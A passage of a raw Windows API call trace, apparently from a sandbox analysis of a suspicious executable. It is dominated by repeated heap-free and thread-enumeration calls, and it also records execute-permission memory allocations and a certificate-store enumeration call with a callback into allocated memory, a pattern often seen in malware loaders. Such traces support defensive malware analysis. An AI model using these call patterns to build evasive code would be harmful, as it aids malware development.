lpMem=0x60dab8 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d890 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d800 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d878 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dad0 | out: hHeap=0x5e0000) returned 1 [0187.757] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60daa0 | out: hHeap=0x5e0000) returned 1 [0187.759] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d7e8 | out: hHeap=0x5e0000) returned 1 [0187.759] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d8a8 | out: hHeap=0x5e0000) returned 1 [0187.759] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d8f0 | out: hHeap=0x5e0000) returned 1 [0187.759] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d818 | out: hHeap=0x5e0000) returned 1 [0187.759] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d950 | out: hHeap=0x5e0000) returned 1 [0187.759] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60da28 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d848 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d9c8 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60da70 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d8c0 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d9f8 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60da40 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d938 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60da10 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d8d8 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d908 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d968 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d920 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d980 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60da58 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60da88 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dc38 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dc08 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dc98 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dba8 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dc20 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60db00 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60db18 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dbf0 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60db90 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dc50 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dc68 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dbd8 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dc80 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dae8 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60db30 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dbc0 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60db48 | out: hHeap=0x5e0000) returned 1 [0187.760] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60db60 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60db78 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d620 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d500 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d518 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d668 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d728 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d680 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d7d0 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d740 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d608 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d758 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d638 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d650 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d710 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d770 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d788 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d7a0 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d698 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d6b0 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d7b8 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d6f8 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d560 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d4e8 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d530 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d5c0 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d6c8 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d6e0 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d5a8 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d548 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d590 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d5d8 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d5f0 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60d578 | out: hHeap=0x5e0000) returned 1 [0187.761] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dd38 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dea0 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dd80 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60de58 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60df00 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dd50 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60ddf8 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60de70 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dfc0 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60df78 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60df18 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60de28 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60de88 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dd98 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60ddb0 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60ddc8 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60de10 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dd08 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dde0 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60df90 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60de40 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dfa8 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dfd8 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dcf0 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dee8 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dd20 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60dd68 | out: hHeap=0x5e0000) returned 1 [0187.762] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60df30 | out: hHeap=0x5e0000) returned 1 [0187.764] SetLastError (dwErrCode=0x578) [0187.765] SetLastError (dwErrCode=0x578) [0187.765] SetLastError (dwErrCode=0x578) [0187.765] SetLastError (dwErrCode=0x578) [0187.765] SetLastError (dwErrCode=0x578) [0187.765] SetLastError (dwErrCode=0x578) [0187.765] SetLastError (dwErrCode=0x578) [0187.765] SetLastError (dwErrCode=0x578) [0187.765] SetLastError (dwErrCode=0x578) [0187.765] SetLastError (dwErrCode=0x578) [0187.765] SetLastError (dwErrCode=0x578) [0187.765] SetLastError (dwErrCode=0x578) [0187.765] GetScrollRange (in: hWnd=0x0, nBar=-2147483648, lpMinPos=0x42ec58, lpMaxPos=0x42e030 | out: lpMinPos=0x42ec58, lpMaxPos=0x42e030) returned 0 [0187.765] GetObjectA (in: h=0x0, c=24, pv=0x19e158 | out: pv=0x19e158) returned 0 [0187.765] NetWkstaGetInfo (in: servername=0x0, level=0x64, bufptr=0x19e120 | out: bufptr=0x19e120) returned 0x0 [0188.094] NetApiBufferFree (Buffer=0x5eebd8) returned 0x0 [0188.094] GetVersionExA (in: lpVersionInformation=0x19e1f8*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19e1f8*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0188.094] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x1) returned 0x1 [0188.094] VerifyVersionInfoW (in: lpVersionInformation=0x19e2f8, dwTypeMask=0x1, dwlConditionMask=0x1 | out: lpVersionInformation=0x19e2f8) returned 0 [0188.094] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0188.094] GetProcAddress (hModule=0x75e90000, lpProcName="GetNativeSystemInfo") returned 0x75ea5130 [0188.094] GetNativeSystemInfo (in: lpSystemInfo=0x19e1d4 | out: lpSystemInfo=0x19e1d4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0188.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40706f, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f8 [0188.095] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40711a, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2fc [0188.096] WaitForMultipleObjects (nCount=0x2, lpHandles=0x19e108*=0x2f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0188.257] CertEnumSystemStore (dwFlags=0x10000, pvSystemStoreLocationPara=0x0, pvArg=0x0, pfnEnum=0x1e0000) [0188.584] GetModuleHandleA (lpModuleName="ntdll") returned 0x77bb0000 [0188.585] GetModuleHandleA (lpModuleName="advapi32") returned 0x761b0000 [0188.592] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0188.609] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.611] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0188.646] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.648] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0188.657] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.659] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0188.670] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.671] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0188.684] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.685] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0188.694] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.696] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0188.705] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.707] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0188.721] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.723] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0188.733] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.736] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0188.745] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.747] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x1f0000 [0188.757] VirtualFree (lpAddress=0x1f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.760] GetModuleHandleA (lpModuleName="ntdll") returned 0x77bb0000 [0188.760] GetModuleHandleA (lpModuleName="advapi32") returned 0x761b0000 [0188.792] GetModuleHandleA (lpModuleName="ntdll") returned 0x77bb0000 [0188.792] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x300 [0188.799] Thread32First (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.800] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.800] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.801] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.801] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.802] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.802] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.803] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.804] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.804] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.805] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.805] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.806] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.806] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.807] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.807] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.808] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.809] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.809] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.810] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.810] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.811] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.811] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.812] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.812] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.813] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.813] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.814] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.814] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.815] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.815] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.816] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.816] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.817] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.817] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.818] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.818] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.819] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.819] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.820] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.821] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.821] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.822] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.822] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.823] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.823] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.824] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.824] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.825] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.825] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.826] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.826] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.827] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.827] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.828] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.828] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.829] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.829] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.830] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.830] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.831] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.831] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.832] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.832] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.833] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.833] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.834] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.834] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.835] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.835] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.836] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.836] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.837] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.837] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.838] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.838] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.839] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.839] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.840] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.841] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.841] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.842] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.842] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.843] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.843] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.844] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.844] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.845] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.845] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.846] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.846] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.847] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.847] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.848] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.848] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.849] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.849] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.850] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.850] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.851] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.851] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.852] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.852] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.853] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.854] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.854] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.855] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.856] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.857] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.857] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.858] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.859] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.859] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.860] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.860] Thread32Next (hSnapshot=0x300, lpte=0x19dfa4) returned 1 [0188.861] Thread32Next 